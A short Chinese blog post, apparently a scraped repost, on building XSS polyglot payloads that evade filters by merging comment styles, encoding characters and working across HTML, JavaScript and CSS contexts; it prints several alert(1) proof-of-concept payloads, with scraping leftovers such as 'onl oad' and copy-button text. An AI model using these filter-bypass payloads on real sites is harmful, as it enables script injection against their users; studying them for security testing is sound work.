多语言有效负载利用多种编码、注入和混淆技术来绕过过滤器、混淆解析器,并跨不同上下文(如 html、javascript、css、json 等)触发执行。-合并评论样式多语言者经常通过合并不同的注释风格来混淆解析器:javascript: //, /* */html: <!-- --><!--<script>/*--><svg onl oad="alert(1)/*</script">--></svg>登录后复制-使用编码实体使用 html 或 url 编码绕过过滤器:html: , "url: %3c, %3e, %22登录后复制<script>alert(1)</script>登录后复制-多语言环境多语言负载可跨多种语言工作,例如 html、javascript、css。"><svg onl oad="alert(1)" style="background:url(javascript:alert(1))"></svg>登录后复制以上就是创建强大的 XSS 多语言的详细内容,更多请关注我的其它相关文章!
标签:XSS,javascript,语言,登录,创建,强大,html,复制 From: https://www.cnblogs.com/aow054/p/18424857